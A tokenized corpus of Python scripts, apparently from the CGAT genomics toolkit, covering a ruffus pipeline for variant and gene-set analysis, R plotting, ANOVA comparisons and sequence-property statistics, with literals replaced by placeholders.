loadNMDSanity ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( importSVs , suffix ( "<STR_LIT>" ) , <EOL> add_inputs ( buildTranscripts ) , <EOL> "<STR_LIT>" ) <EOL> def countOverlapBetweenSVsandTranscripts ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> infile , transcripts = infiles <EOL> patterns = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:all>" , "<STR_LIT>" ) , ) <EOL> for suffix , tst in patterns : <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( countOverlapBetweenSVsandTranscripts , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadSVOverlap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> for pattern in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:all>" ) : <EOL> tt = table + "<STR_LIT>" % pattern <EOL> suffix = "<STR_LIT>" % pattern <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadSVOverlap , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeSVsPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> patterns = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:all>" ) <EOL> tables = [ "<STR_LIT>" % ( track , pattern , x ) for x , pattern in enumerate ( patterns ) ] <EOL> sqltables = "<STR_LIT:U+002C>" . join ( tables ) <EOL> sqlcount = [ "<STR_LIT>" % ( x , pattern ) for x , pattern in enumerate ( patterns ) ] <EOL> sqlcount = "<STR_LIT:U+002CU+0020>" . join ( sqlcount ) <EOL> sqldummy = [ "<STR_LIT>" % pattern for pattern in patterns ] <EOL> sqldummy = "<STR_LIT:U+002CU+0020>" . join ( sqldummy ) <EOL> sqlwhere = [ "<STR_LIT>" % x for x , pattern in enumerate ( patterns ) ] <EOL> sqlwhere = "<STR_LIT>" . join ( sqlwhere ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> for pattern in patterns : <EOL> Database . executewait ( dbhandle , <EOL> "<STR_LIT>" % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ files ( [ ( None , "<STR_LIT>" ) , ] ) <EOL> def createGO ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGO . createGO ( infile , outfile ) <EOL> @ files_re ( createGO , "<STR_LIT>" , r"<STR_LIT>" ) <EOL> def createGOSlim ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGO . createGOSlim ( infile , outfile ) <EOL> @ transform ( ( createGO , createGOSlim ) , regex ( r"<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def loadGOAssignments ( infile , outfile ) : <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( importMGI , "<STR_LIT>" ) , ) ) <EOL> def createMGI ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' <EOL> cc = dbhandle . cursor ( ) <EOL> data = cc . execute ( statement ) . fetchall ( ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ "<STR_LIT:\t>" . join ( x ) for x in data ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> def buildGeneMatrix ( tracks , analysis , statement , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> all_genes = [ x [ <NUM_LIT:0> ] for x in cc . execute ( '''<STR_LIT>''' % locals ( ) ) ] <EOL> gene2row = dict ( [ ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) for x in enumerate ( all_genes ) ] ) <EOL> matrix = numpy . zeros ( ( len ( all_genes ) , len ( analysis ) * len ( tracks ) ) , numpy . int ) <EOL> col = <NUM_LIT:0> <EOL> for track in tracks : <EOL> for label , field_where in analysis : <EOL> genes = [ x [ <NUM_LIT:0> ] for x in cc . execute ( statement % locals ( ) ) ] <EOL> for gene_id in genes : <EOL> matrix [ gene2row [ gene_id ] ] [ col ] = <NUM_LIT:1> <EOL> col += <NUM_LIT:1> <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( "<STR_LIT>" % ( x , y [ <NUM_LIT:0> ] ) for x , y in itertools . product ( tracks , analysis ) ) ) <EOL> for gene_id in all_genes : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , "<STR_LIT:\t>" . join ( map ( str , matrix [ gene2row [ gene_id ] ] ) ) ) ) <EOL> outf . close ( ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixEffects ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixAlleles ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeEffectsPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixConsequences ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeSVsPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixStructuralVariants ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ follows ( buildGeneMatrixConsequences , <EOL> buildGeneMatrixAlleles , <EOL> buildGeneMatrixEffects , <EOL> buildGeneMatrixStructuralVariants ) <EOL> @ files ( [ ( ( x , y ) , "<STR_LIT>" % ( re . sub ( "<STR_LIT>" , "<STR_LIT>" , x ) , re . sub ( "<STR_LIT>" , "<STR_LIT>" , y ) ) ) for x , y in itertools . product ( glob . glob ( "<STR_LIT>" ) , <EOL> glob . glob ( "<STR_LIT>" ) ) <EOL> if not y . endswith ( "<STR_LIT>" ) ] ) <EOL> def runGeneListAnalysis ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> genematrix , assignments = infiles <EOL> to_cluster = True <EOL> try : <EOL> options = "<STR_LIT>" % PARAMS <EOL> except TypeError : <EOL> options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( runGeneListAnalysis , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGeneListAnalysis ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( loadTranscripts , <EOL> loadTranscriptInformation , <EOL> loadGeneStats , <EOL> loadGeneInformation , <EOL> loadHumanOrthologs , <EOL> loadGene2Omim , <EOL> createGO , <EOL> createGOSlim , <EOL> createMGI ) <EOL> def prepare ( ) : <EOL> pass <EOL> @ follows ( makeEffects , loadEffects , summarizeEffectsPerGene ) <EOL> def consequences ( ) : pass <EOL> @ follows ( buildAlleles , loadAlleles , <EOL> summarizeAllelesPerTranscript , <EOL> summarizeAllelesPerGene , <EOL> combineSummaryAllelesPerGene ) <EOL> def alleles ( ) : pass <EOL> @ follows ( loadPolyphen , loadPolyphenMap , loadPanther ) <EOL> def effects ( ) : pass <EOL> @ follows ( loadAnnotations , loadAnnotationsSummary ) <EOL> def annotations ( ) : pass <EOL> @ follows ( prepare , consequences , effects , alleles , annotations ) <EOL> def full ( ) : pass <EOL> @ follows ( buildQTLWorkspaces , <EOL> runGATOnQTLs , <EOL> runGATOnQTLsSmall ) <EOL> def qtl ( ) : pass <EOL> @ follows ( importSVs , <EOL> countOverlapBetweenSVsandTranscripts , <EOL> loadSVOverlap ) <EOL> def svs ( ) : pass <EOL> @ follows ( buildGeneMatrixConsequences , <EOL> buildGeneMatrixAlleles , <EOL> buildGeneMatrixEffects , <EOL> runGeneListAnalysis , <EOL> loadGeneListAnalysis , <EOL> loadGOAssignments , <EOL> ) <EOL> def go ( ) : pass <EOL> @ follows ( loadExpressionData , <EOL> correlateExpressionAndNMDByTranscript , <EOL> correlateExpressionAndNMDByGene , <EOL> loadExpressionPerGene , <EOL> loadNMDSanity ) <EOL> def expression ( ) : pass <EOL> @ follows ( loadSNPValidationData , <EOL> buildSNPBlacklist , <EOL> recallGenomicSNPs ) <EOL> def validation ( ) : pass <EOL> @ files ( [ ( None , "<STR_LIT>" ) , ] ) <EOL> def clone ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> src_dir , level = sys . argv [ - <NUM_LIT:2> : ] <EOL> if not os . path . exists ( src_dir ) : <EOL> raise IOError ( "<STR_LIT>" % src_dir ) <EOL> if not os . path . exists ( os . path . join ( src_dir , "<STR_LIT>" ) ) : <EOL> raise IOError ( "<STR_LIT>" % src_dir ) <EOL> if level in ( "<STR_LIT:data>" , ) : <EOL> P . execute ( "<STR_LIT>" ) <EOL> P . execute ( "<STR_LIT>" ) <EOL> @ merge ( ( alleles , prepare ) , "<STR_LIT>" ) <EOL> def createViewGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" ) <EOL> knockouts = "<STR_LIT:U+002C>" . join ( [ "<STR_LIT>" % ( track , track ) for track in TRACKS ] ) <EOL> statement = '''<STR_LIT>''' <EOL> Database . executewait ( dbhandle , statement % locals ( ) ) <EOL> @ follows ( createViewGenes ) <EOL> def views ( ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( P . main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> from rpy2 . robjects import r as R <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:width>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , choices = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = "<STR_LIT:string>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> height = <NUM_LIT> , width = <NUM_LIT> , number = <NUM_LIT:5> , colour = "<STR_LIT>" , margins = "<STR_LIT>" , cex_names = <NUM_LIT:1> , cex_axis = <NUM_LIT:1> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . number > <NUM_LIT:20> : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> inf = options . infile <EOL> outf = options . outfile <EOL> R ( '''<STR_LIT>''' % <EOL> inf ) <EOL> R ( '''<STR_LIT>''' % <EOL> ( outf , options . height , options . width ) ) <EOL> R ( '''<STR_LIT>''' % options . number ) <EOL> R ( '''<STR_LIT>''' % options . margins ) <EOL> if options . side : <EOL> horiz = "<STR_LIT>" <EOL> else : <EOL> horiz = "<STR_LIT>" <EOL> R ( '''<STR_LIT>''' % ( options . number , options . colour , horiz , options . cex_names , options . cex_axis ) ) <EOL> R [ "<STR_LIT>" ] ( ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:test>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> import CGAT . IOTools as IOTools <EOL> from rpy2 . robjects import r as R <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> columns = "<STR_LIT:all>" , <EOL> filename_tree = None , <EOL> add_header = True , <EOL> write_header = False , <EOL> debug = False , <EOL> methods = [ ] , <EOL> value_format = "<STR_LIT>" , <EOL> pvalue_format = "<STR_LIT>" , <EOL> display_tree = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , quiet = True ) <EOL> if options . columns not in ( "<STR_LIT:all>" , "<STR_LIT>" ) : <EOL> options . columns = map ( lambda x : int ( x ) - <NUM_LIT:1> , options . columns . split ( "<STR_LIT:U+002C>" ) ) <EOL> data = [ ] <EOL> options . filenames = args <EOL> for filename in options . filenames : <EOL> infile = open ( filename , "<STR_LIT:r>" ) <EOL> table , headers = IOTools . readTable ( <EOL> infile , take = options . columns , headers = False ) <EOL> infile . close ( ) <EOL> data . append ( table ) <EOL> fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for field in fields : <EOL> options . stdout . write ( "<STR_LIT>" % field ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> for x in range ( len ( data ) ) : <EOL> for y in range ( x + <NUM_LIT:1> , len ( data ) ) : <EOL> rpy . set_default_mode ( rpy . NO_CONVERSION ) <EOL> factors = [ "<STR_LIT:x>" ] * len ( data [ x ] [ : , <NUM_LIT:0> ] ) + [ "<STR_LIT:y>" ] * len ( data [ y ] [ : , <NUM_LIT:0> ] ) <EOL> values = list ( data [ x ] [ : , <NUM_LIT:0> ] ) + list ( data [ y ] [ : , <NUM_LIT:0> ] ) <EOL> linear_model = R . lm ( <EOL> R ( "<STR_LIT>" ) , data = R . data_frame ( x = factors , y = values ) ) <EOL> rpy . set_default_mode ( rpy . BASIC_CONVERSION ) <EOL> result = R . anova ( linear_model ) <EOL> options . stdout . write ( <EOL> "<STR_LIT>" % ( options . filenames [ x ] , options . filenames [ y ] ) ) <EOL> for field in fields : <EOL> options . stdout . write ( "<STR_LIT>" % str ( result [ field ] ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import math <EOL> import CGAT . Experiment as E <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . SequenceProperties as SequenceProperties <EOL> import CGAT . FastaIterator as FastaIterator <EOL> def main ( argv = None ) : <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> filename_weights = None , <EOL> pseudocounts = <NUM_LIT:1> , <EOL> sections = [ ] , <EOL> regex_identifier = "<STR_LIT>" , <EOL> seqtype = "<STR_LIT>" , <EOL> gap_chars = '<STR_LIT>' , <EOL> split_id = False , <EOL> add_total = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> rx = re . compile ( options . regex_identifier ) <EOL> reference_codons = [ ] <EOL> if options . filename_weights : <EOL> options . filename_weights = options . filename_weights . split ( "<STR_LIT:U+002C>" ) <EOL> for filename in options . filename_weights : <EOL> if filename == "<STR_LIT>" : <EOL> reference_codons . append ( Genomics . GetUniformCodonUsage ( ) ) <EOL> else : <EOL> reference_codons . append ( <EOL> IOTools . ReadMap ( IOTools . openFile ( filename , "<STR_LIT:r>" ) , <EOL> has_header = True , <EOL> map_functions = ( str , float ) ) ) <EOL> options . stdlog . write ( <EOL> "<STR_LIT>" ) <EOL> for x in range ( <NUM_LIT:0> , len ( reference_codons ) ) : <EOL> for y in range ( <NUM_LIT:0> , len ( reference_codons ) ) : <EOL> if x == y : <EOL> continue <EOL> a = reference_codons [ x ] <EOL> b = reference_codons [ y ] <EOL> d = <NUM_LIT:0> <EOL> for codon , p in a . items ( ) : <EOL> if Genomics . IsStopCodon ( codon ) : <EOL> continue <EOL> d += b [ codon ] * math . log ( b [ codon ] / p ) <EOL> options . stdlog . write ( "<STR_LIT>" % <EOL> ( options . filename_weights [ x ] , <EOL> options . filename_weights [ y ] , <EOL> d ) ) <EOL> iterator = FastaIterator . FastaIterator ( options . stdin ) <EOL> def getCounter ( section ) : <EOL> if options . seqtype == "<STR_LIT>" : <EOL> if section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesLength ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesSequence ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesHid ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesNA ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesGaps ( <EOL> options . gap_chars ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCpg ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesDN ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesAA ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesDegeneracy ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesBias ( reference_codons ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodons ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodonUsage ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodonTranslator ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % section ) <EOL> elif options . seqtype == "<STR_LIT>" : <EOL> if section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesLength ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesSequence ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesHid ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesAminoAcids ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % section ) <EOL> return s <EOL> totals = { } <EOL> for section in options . sections : <EOL> totals [ section ] = getCounter ( section ) <EOL> options . stdout . write ( "<STR_LIT:id>" ) <EOL> for section in options . sections : <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( totals [ section ] . getHeaders ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> options . stdout . flush ( ) <EOL> s = getCounter ( "<STR_LIT>" ) <EOL> s . loadSequence ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for cur_record in iterator : <EOL> sequence = re . sub ( "<STR_LIT:U+0020>" , "<STR_LIT>" , cur_record . sequence ) . upper ( ) <EOL> if len ( sequence ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % cur_record . title ) <EOL> id = rx . search ( cur_record . title ) . groups ( ) [ <NUM_LIT:0> ] <EOL> if options . split_id is True : <EOL> options . stdout . write ( "<STR_LIT:%s>" % id . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> options . stdout . write ( "<STR_LIT:%s>" % id ) <EOL> options . stdout . flush ( ) <EOL> for section in options . sections : <EOL> s = getCounter ( section ) <EOL> s . loadSequence ( sequence , options . seqtype ) <EOL> totals [ section ] . addProperties ( s ) <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( s . getFields ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> if options . add_total : <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for section in options . sections : <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( totals [ section ] . getFields ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import CGAT . Experiment as E <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> import CGAT . IndexedGenome as IndexedGenome <EOL> import CGAT . Intervals as Intervals <EOL> import CGAT . Stats as Stats <EOL> import CGAT . GTF as GTF <EOL> def decorator_counts ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_percent_coverage ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return <NUM_LIT> * float ( d [ '<STR_LIT>' ] ) / ( end - start ) , str ( d ) <EOL> def decorator_mean_length ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_median_length ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_percent_gc ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> l , ngc = <NUM_LIT:0> , <NUM_LIT:0> <EOL> sequence = fasta . getSequence ( contig , "<STR_LIT:+>" , start , end ) <EOL> for istart , iend in intervals : <EOL> ngc += len ( filter ( lambda x : x in "<STR_LIT>" , <EOL> sequence [ istart - start : iend - start ] ) ) <EOL> l += iend - istart <EOL> return <NUM_LIT> * ngc / l , None <EOL> def decorator_median_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_mean_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> 